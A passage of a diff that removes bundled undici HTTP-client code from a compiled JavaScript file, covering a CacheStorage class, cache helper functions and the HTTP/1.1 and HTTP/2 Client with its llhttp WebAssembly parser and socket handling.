webidl.converters.DOMString(cacheName) - - // 2.1 - if (this.#caches.has(cacheName)) { - // await caches.open('v1') !== await caches.open('v1') - - // 2.1.1 - const cache = this.#caches.get(cacheName) - - // 2.1.1.1 - return new Cache(kConstruct, cache) - } - - // 2.2 - const cache = [] - - // 2.3 - this.#caches.set(cacheName, cache) - - // 2.4 - return new Cache(kConstruct, cache) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete - * @param {string} cacheName - * @returns {Promise} - */ - async delete (cacheName) { - webidl.brandCheck(this, CacheStorage) - webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) - - cacheName = webidl.converters.DOMString(cacheName) - - return this.#caches.delete(cacheName) - } - - /** - * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys - * @returns {string[]} - */ - async keys () { - webidl.brandCheck(this, CacheStorage) - - // 2.1 - const keys = this.#caches.keys() - - // 2.2 - return [...keys] - } -} - -Object.defineProperties(CacheStorage.prototype, { - [Symbol.toStringTag]: { - value: 'CacheStorage', - configurable: true - }, - match: kEnumerableProperty, - has: kEnumerableProperty, - open: kEnumerableProperty, - delete: kEnumerableProperty, - keys: kEnumerableProperty -}) - -module.exports = { - CacheStorage -} - - -/***/ }), - -/***/ 9174: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports = { - kConstruct: (__nccwpck_require__(2785).kConstruct) -} - - -/***/ }), - -/***/ 2396: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { URLSerializer } = __nccwpck_require__(685) -const { isValidHeaderName } = __nccwpck_require__(2538) - -/** - * @see https://url.spec.whatwg.org/#concept-url-equals - * @param {URL} A - * @param {URL} B - * @param {boolean | undefined} excludeFragment - * @returns {boolean} - */ -function urlEquals (A, B, excludeFragment = false) { - const serializedA = URLSerializer(A, excludeFragment) - - const serializedB = URLSerializer(B, excludeFragment) - - return serializedA === serializedB -} - -/** - * @see https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 - * @param {string} header - */ -function fieldValues (header) { - assert(header !== null) - - const values = [] - - for (let value of header.split(',')) { - value = value.trim() - - if (!value.length) { - continue - } else if (!isValidHeaderName(value)) { - continue - } - - values.push(value) - } - - return values -} - -module.exports = { - urlEquals, - fieldValues -} - - -/***/ }), - -/***/ 3598: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// @ts-check - - - -/* global WebAssembly */ - -const assert = __nccwpck_require__(9491) -const net = __nccwpck_require__(1808) -const http = __nccwpck_require__(3685) -const { pipeline } = __nccwpck_require__(2781) -const util = __nccwpck_require__(3983) -const timers = __nccwpck_require__(9459) -const Request = __nccwpck_require__(2905) -const DispatcherBase = __nccwpck_require__(4839) -const { - RequestContentLengthMismatchError, - ResponseContentLengthMismatchError, - InvalidArgumentError, - RequestAbortedError, - HeadersTimeoutError, - HeadersOverflowError, - SocketError, - InformationalError, - BodyTimeoutError, - HTTPParserError, - ResponseExceededMaxSizeError, - ClientDestroyedError -} = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) -const { - kUrl, - kReset, - kServerName, - kClient, - kBusy, - kParser, - kConnect, - kBlocking, - kResuming, - kRunning, - kPending, - kSize, - kWriting, - kQueue, - kConnected, - kConnecting, - kNeedDrain, - kNoRef, - kKeepAliveDefaultTimeout, - kHostHeader, - kPendingIdx, - kRunningIdx, - kError, - kPipelining, - kSocket, - kKeepAliveTimeoutValue, - kMaxHeadersSize, - kKeepAliveMaxTimeout, - kKeepAliveTimeoutThreshold, - kHeadersTimeout, - kBodyTimeout, - kStrictContentLength, - kConnector, - kMaxRedirections, - kMaxRequests, - kCounter, - kClose, - kDestroy, - kDispatch, - kInterceptors, - kLocalAddress, - kMaxResponseSize, - kHTTPConnVersion, - // HTTP2 - kHost, - kHTTP2Session, - kHTTP2SessionState, - kHTTP2BuildRequest, - kHTTP2CopyHeaders, - kHTTP1BuildRequest -} = __nccwpck_require__(2785) - -/** @type {import('http2')} */ -let http2 -try { - http2 = __nccwpck_require__(5158) -} catch { - // @ts-ignore - http2 = { constants: {} } -} - -const { - constants: { - HTTP2_HEADER_AUTHORITY, - HTTP2_HEADER_METHOD, - HTTP2_HEADER_PATH, - HTTP2_HEADER_SCHEME, - HTTP2_HEADER_CONTENT_LENGTH, - HTTP2_HEADER_EXPECT, - HTTP2_HEADER_STATUS - } -} = http2 - -// Experimental -let h2ExperimentalWarned = false - -const FastBuffer = Buffer[Symbol.species] - -const kClosedResolve = Symbol('kClosedResolve') - -const channels = {} - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') - channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') - channels.connectError = diagnosticsChannel.channel('undici:client:connectError') - channels.connected = diagnosticsChannel.channel('undici:client:connected') -} catch { - channels.sendHeaders = { hasSubscribers: false } - channels.beforeConnect = { hasSubscribers: false } - channels.connectError = { hasSubscribers: false } - channels.connected = { hasSubscribers: false } -} - -/** - * @type {import('../types/client').default} - */ -class Client extends DispatcherBase { - /** - * - * @param {string|URL} url - * @param {import('../types/client').Client.Options} options - */ - constructor (url, { - interceptors, - maxHeaderSize, - headersTimeout, - socketTimeout, - requestTimeout, - connectTimeout, - bodyTimeout, - idleTimeout, - keepAlive, - keepAliveTimeout, - maxKeepAliveTimeout, - keepAliveMaxTimeout, - keepAliveTimeoutThreshold, - socketPath, - pipelining, - tls, - strictContentLength, - maxCachedSessions, - maxRedirections, - connect, - maxRequestsPerClient, - localAddress, - maxResponseSize, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - // h2 - allowH2, - maxConcurrentStreams - } = {}) { - super() - - if (keepAlive !== undefined) { - throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') - } - - if (socketTimeout !== undefined) { - throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') - } - - if (requestTimeout !== undefined) { - throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') - } - - if (idleTimeout !== undefined) { - throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') - } - - if (maxKeepAliveTimeout !== undefined) { - throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') - } - - if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { - throw new InvalidArgumentError('invalid maxHeaderSize') - } - - if (socketPath != null && typeof socketPath !== 'string') { - throw new InvalidArgumentError('invalid socketPath') - } - - if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { - throw new InvalidArgumentError('invalid connectTimeout') - } - - if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveTimeout') - } - - if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { - throw new InvalidArgumentError('invalid keepAliveMaxTimeout') - } - - if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { - throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') - } - - if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') - } - - if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { - throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') - } - - if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { - throw new InvalidArgumentError('localAddress must be valid string IP address') - } - - if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { - throw new InvalidArgumentError('maxResponseSize must be a positive number') - } - - if ( - autoSelectFamilyAttemptTimeout != null && - (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) - ) { - throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') - } - - // h2 - if (allowH2 != null && typeof allowH2 !== 'boolean') { - throw new InvalidArgumentError('allowH2 must be a valid boolean value') - } - - if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { - throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) - ? interceptors.Client - : [createRedirectInterceptor({ maxRedirections })] - this[kUrl] = util.parseOrigin(url) - this[kConnector] = connect - this[kSocket] = null - this[kPipelining] = pipelining != null ? pipelining : 1 - this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize - this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout - this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout - this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold - this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] - this[kServerName] = null - this[kLocalAddress] = localAddress != null ? localAddress : null - this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming - this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` - this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 - this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 - this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength - this[kMaxRedirections] = maxRedirections - this[kMaxRequests] = maxRequestsPerClient - this[kClosedResolve] = null - this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 - this[kHTTPConnVersion] = 'h1' - - // HTTP/2 - this[kHTTP2Session] = null - this[kHTTP2SessionState] = !allowH2 - ? null - : { - // streams: null, // Fixed queue of streams - For future support of `push` - openStreams: 0, // Keep track of them to decide wether or not unref the session - maxConcurrentStreams: maxConcurrentStreams != null ? maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server - } - this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` - - // kQueue is built up of 3 sections separated by - // the kRunningIdx and kPendingIdx indices. - // | complete | running | pending | - // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length - // kRunningIdx points to the first running element. - // kPendingIdx points to the first pending element. - // This implements a fast queue with an amortized - // time of O(1). - - this[kQueue] = [] - this[kRunningIdx] = 0 - this[kPendingIdx] = 0 - } - - get pipelining () { - return this[kPipelining] - } - - set pipelining (value) { - this[kPipelining] = value - resume(this, true) - } - - get [kPending] () { - return this[kQueue].length - this[kPendingIdx] - } - - get [kRunning] () { - return this[kPendingIdx] - this[kRunningIdx] - } - - get [kSize] () { - return this[kQueue].length - this[kRunningIdx] - } - - get [kConnected] () { - return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed - } - - get [kBusy] () { - const socket = this[kSocket] - return ( - (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || - (this[kSize] >= (this[kPipelining] || 1)) || - this[kPending] > 0 - ) - } - - /* istanbul ignore: only used for test */ - [kConnect] (cb) { - connect(this) - this.once('connect', cb) - } - - [kDispatch] (opts, handler) { - const origin = opts.origin || this[kUrl].origin - - const request = this[kHTTPConnVersion] === 'h2' - ? Request[kHTTP2BuildRequest](origin, opts, handler) - : Request[kHTTP1BuildRequest](origin, opts, handler) - - this[kQueue].push(request) - if (this[kResuming]) { - // Do nothing. - } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { - // Wait a tick in case stream/iterator is ended in the same tick. - this[kResuming] = 1 - process.nextTick(resume, this) - } else { - resume(this, true) - } - - if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { - this[kNeedDrain] = 2 - } - - return this[kNeedDrain] < 2 - } - - async [kClose] () { - // TODO: for H2 we need to gracefully flush the remaining enqueued - // request and close each stream. - return new Promise((resolve) => { - if (!this[kSize]) { - resolve(null) - } else { - this[kClosedResolve] = resolve - } - }) - } - - async [kDestroy] (err) { - return new Promise((resolve) => { - const requests = this[kQueue].splice(this[kPendingIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - - const callback = () => { - if (this[kClosedResolve]) { - // TODO (fix): Should we error here with ClientDestroyedError? - this[kClosedResolve]() - this[kClosedResolve] = null - } - resolve() - } - - if (this[kHTTP2Session] != null) { - util.destroy(this[kHTTP2Session], err) - this[kHTTP2Session] = null - this[kHTTP2SessionState] = null - } - - if (!this[kSocket]) { - queueMicrotask(callback) - } else { - util.destroy(this[kSocket].on('close', callback), err) - } - - resume(this) - }) - } -} - -function onHttp2SessionError (err) { - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - this[kSocket][kError] = err - - onError(this[kClient], err) -} - -function onHttp2FrameError (type, code, id) { - const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - - if (id === 0) { - this[kSocket][kError] = err - onError(this[kClient], err) - } -} - -function onHttp2SessionEnd () { - util.destroy(this, new SocketError('other side closed')) - util.destroy(this[kSocket], new SocketError('other side closed')) -} - -function onHTTP2GoAway (code) { - const client = this[kClient] - const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) - client[kSocket] = null - client[kHTTP2Session] = null - - if (client.destroyed) { - assert(this[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - } else if (client[kRunning] > 0) { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', - client[kUrl], - [client], - err - ) - - resume(client) -} - -const constants = __nccwpck_require__(953) -const createRedirectInterceptor = __nccwpck_require__(8861) -const EMPTY_BUF = Buffer.alloc(0) - -async function lazyllhttp () { - const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined - - let mod - try { - mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) - } catch (e) { - /* istanbul ignore next */ - - // We could check if the error was caused by the simd option not - // being enabled, but the occurring of this other error - // * https://github.com/emscripten-core/emscripten/issues/11495 - // got me to remove that check to avoid breaking Node 12. - mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) - } - - return await WebAssembly.instantiate(mod, { - env: { - /* eslint-disable camelcase */ - - wasm_on_url: (p, at, len) => { - /* istanbul ignore next */ - return 0 - }, - wasm_on_status: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_begin: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageBegin() || 0 - }, - wasm_on_header_field: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_header_value: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 - }, - wasm_on_body: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_complete: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageComplete() || 0 - } - - /* eslint-enable camelcase */ - } - }) -} - -let llhttpInstance = null -let llhttpPromise = lazyllhttp() -llhttpPromise.catch() - -let currentParser = null -let currentBufferRef = null -let currentBufferSize = 0 -let currentBufferPtr = null - -const TIMEOUT_HEADERS = 1 -const TIMEOUT_BODY = 2 -const TIMEOUT_IDLE = 3 - -class Parser { - constructor (client, socket, { exports }) { - assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) - - this.llhttp = exports - this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) - this.client = client - this.socket = socket - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - this.statusCode = null - this.statusText = '' - this.upgrade = false - this.headers = [] - this.headersSize = 0 - this.headersMaxSize = client[kMaxHeadersSize] - this.shouldKeepAlive = false - this.paused = false - this.resume = this.resume.bind(this) - - this.bytesRead = 0 - - this.keepAlive = '' - this.contentLength = '' - this.connection = '' - this.maxResponseSize = client[kMaxResponseSize] - } - - setTimeout (value, type) { - this.timeoutType = type - if (value !== this.timeoutValue) { - timers.clearTimeout(this.timeout) - if (value) { - this.timeout = timers.setTimeout(onParserTimeout, value, this) - // istanbul ignore else: only for jest - if (this.timeout.unref) { - this.timeout.unref() - } - } else { - this.timeout = null - } - this.timeoutValue = value - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - } - - resume () { - if (this.socket.destroyed || !this.paused) { - return - } - - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_resume(this.ptr) - - assert(this.timeoutType === TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - this.paused = false - this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. - this.readMore() - } - - readMore () { - while (!this.paused && this.ptr) { - const chunk = this.socket.read() - if (chunk === null) { - break - } - this.execute(chunk) - } - } - - execute (data) { - assert(this.ptr != null) - assert(currentParser == null) - assert(!this.paused) - - const { socket, llhttp } = this - - if (data.length > currentBufferSize) { - if (currentBufferPtr) { - llhttp.free(currentBufferPtr) - } - currentBufferSize = Math.ceil(data.length / 4096) * 4096 - currentBufferPtr = llhttp.malloc(currentBufferSize) - } - - new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) - - // Call `execute` on the wasm parser. - // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, - // and finally the length of bytes to parse. - // The return value is an error code or `constants.ERROR.OK`. - try { - let ret - - try { - currentBufferRef = data - currentParser = this - ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) - /* eslint-disable-next-line no-useless-catch */ - } catch (err) { - /* istanbul ignore next: difficult to make a test case for */ - throw err - } finally { - currentParser = null - currentBufferRef = null - } - - const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr - - if (ret === constants.ERROR.PAUSED_UPGRADE) { - this.onUpgrade(data.slice(offset)) - } else if (ret === constants.ERROR.PAUSED) { - this.paused = true - socket.unshift(data.slice(offset)) - } else if (ret !== constants.ERROR.OK) { - const ptr = llhttp.llhttp_get_error_reason(this.ptr) - let message = '' - /* istanbul ignore else: difficult to make a test case for */ - if (ptr) { - const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) - message = - 'Response does not match the HTTP/1.1 protocol (' + - Buffer.from(llhttp.memory.buffer, ptr, len).toString() + - ')' - } - throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) - } - } catch (err) { - util.destroy(socket, err) - } - } - - destroy () { - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_free(this.ptr) - this.ptr = null - - timers.clearTimeout(this.timeout) - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - - this.paused = false - } - - onStatus (buf) { - this.statusText = buf.toString() - } - - onMessageBegin () { - const { socket, client } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - if (!request) { - return -1 - } - } - - onHeaderField (buf) { - const len = this.headers.length - - if ((len & 1) === 0) { - this.headers.push(buf) - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - this.trackHeader(buf.length) - } - - onHeaderValue (buf) { - let len = this.headers.length - - if ((len & 1) === 1) { - this.headers.push(buf) - len += 1 - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - const key = this.headers[len - 2] - if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { - this.keepAlive += buf.toString() - } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { - this.connection += buf.toString() - } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { - this.contentLength += buf.toString() - } - - this.trackHeader(buf.length) - } - - trackHeader (len) { - this.headersSize += len - if (this.headersSize >= this.headersMaxSize) { - util.destroy(this.socket, new HeadersOverflowError()) - } - } - - onUpgrade (head) { - const { upgrade, client, socket, headers, statusCode } = this - - assert(upgrade) - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(!socket.destroyed) - assert(socket === client[kSocket]) - assert(!this.paused) - assert(request.upgrade || request.method === 'CONNECT') - - this.statusCode = null - this.statusText = '' - this.shouldKeepAlive = null - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - socket.unshift(head) - - socket[kParser].destroy() - socket[kParser] = null - - socket[kClient] = null - socket[kError] = null - socket - .removeListener('error', onSocketError) - .removeListener('readable', onSocketReadable) - .removeListener('end', onSocketEnd) - .removeListener('close', onSocketClose) - - client[kSocket] = null - client[kQueue][client[kRunningIdx]++] = null - client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) - - try { - request.onUpgrade(statusCode, headers, socket) - } catch (err) { - util.destroy(socket, err) - } - - resume(client) - } - - onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { - const { client, socket, headers, statusText } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - - /* istanbul ignore next: difficult to make a test case for */ - if (!request) { - return -1 - } - - assert(!this.upgrade) - assert(this.statusCode < 200) - - if (statusCode === 100) { - util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) - return -1 - } - - /* this can only happen if server is misbehaving */ - if (upgrade && !request.upgrade) { - util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) - return -1 - } - - assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) - - this.statusCode = statusCode - this.shouldKeepAlive = ( - shouldKeepAlive || - // Override llhttp value which does not allow keepAlive for HEAD. - (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') - ) - - if (this.statusCode >= 200) { - const bodyTimeout = request.bodyTimeout != null - ? request.bodyTimeout - : client[kBodyTimeout] - this.setTimeout(bodyTimeout, TIMEOUT_BODY) - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - if (request.method === 'CONNECT') { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - if (upgrade) { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (this.shouldKeepAlive && client[kPipelining]) { - const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null - - if (keepAliveTimeout != null) { - const timeout = Math.min( - keepAliveTimeout - client[kKeepAliveTimeoutThreshold], - client[kKeepAliveMaxTimeout] - ) - if (timeout <= 0) { - socket[kReset] = true - } else { - client[kKeepAliveTimeoutValue] = timeout - } - } else { - client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] - } - } else { - // Stop more requests from being dispatched. - socket[kReset] = true - } - - const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false - - if (request.aborted) { - return -1 - } - - if (request.method === 'HEAD') { - return 1 - } - - if (statusCode < 200) { - return 1 - } - - if (socket[kBlocking]) { - socket[kBlocking] = false - resume(client) - } - - return pause ? constants.ERROR.PAUSED : 0 - } - - onBody (buf) { - const { client, socket, statusCode, maxResponseSize } = this - - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert.strictEqual(this.timeoutType, TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - assert(statusCode >= 200) - - if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { - util.destroy(socket, new ResponseExceededMaxSizeError()) - return -1 - } - - this.bytesRead += buf.length - - if (request.onData(buf) === false) { - return constants.ERROR.PAUSED - } - } - - onMessageComplete () { - const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this - - if (socket.destroyed && (!statusCode || shouldKeepAlive)) { - return -1 - } - - if (upgrade) { - return - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(statusCode >= 100) - - this.statusCode = null - this.statusText = '' - this.bytesRead = 0 - this.contentLength = '' - this.keepAlive = '' - this.connection = '' - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (statusCode < 200) { - return - } - - /* istanbul ignore next: should be handled by llhttp? */ - if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { - util.destroy(socket, new ResponseContentLengthMismatchError()) - return -1 - } - - request.onComplete(headers) - - client[kQueue][client[kRunningIdx]++] = null - - if (socket[kWriting]) { - assert.strictEqual(client[kRunning], 0) - // Response completed before request. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (!shouldKeepAlive) { - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (socket[kReset] && client[kRunning] === 0) { - // Destroy socket once all requests have completed. - // The request at the tail of the pipeline is the one - // that requested reset and no further requests should - // have been queued since then. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (client[kPipelining] === 1) { - // We must wait a full event loop cycle to reuse this socket to make sure - // that non-spec compliant servers are not closing the connection even if they - // said they won't. - setImmediate(resume, client) - } else { - resume(client) - } - } -} - -function onParserTimeout (parser) { - const { socket, timeoutType, client } = parser - - /* istanbul ignore else */ - if (timeoutType === TIMEOUT_HEADERS) { - if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { - assert(!parser.paused, 'cannot be paused while waiting for headers') - util.destroy(socket, new HeadersTimeoutError()) - } - } else if (timeoutType === TIMEOUT_BODY) { - if (!parser.paused) { - util.destroy(socket, new BodyTimeoutError()) - } - } else if (timeoutType === TIMEOUT_IDLE) { - assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) - util.destroy(socket, new InformationalError('socket idle timeout')) - } -} - -function onSocketReadable () { - const { [kParser]: parser } = this - if (parser) { - parser.readMore() - } -} - -function onSocketError (err) { - const { [kClient]: client, [kParser]: parser } = this - - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - if (client[kHTTPConnVersion] !== 'h2') { - // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded - // to the user. - if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so for as a valid response. - parser.onMessageComplete() - return - } - } - - this[kError] = err - - onError(this[kClient], err) -} - -function onError (client, err) { - if ( - client[kRunning] === 0 && - err.code !== 'UND_ERR_INFO' && - err.code !== 'UND_ERR_SOCKET' - ) { - // Error is not caused by running request and not a recoverable - // socket error. - - assert(client[kPendingIdx] === client[kRunningIdx]) - - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - assert(client[kSize] === 0) - } -} - -function onSocketEnd () { - const { [kParser]: parser, [kClient]: client } = this - - if (client[kHTTPConnVersion] !== 'h2') { - if (parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - return - } - } - - util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) -} - -function onSocketClose () { - const { [kClient]: client, [kParser]: parser } = this - - if (client[kHTTPConnVersion] === 'h1' && parser) { - if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - } - - this[kParser].destroy() - this[kParser] = null - } - - const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) - - client[kSocket] = null - - if (client.destroyed) { - assert(client[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) 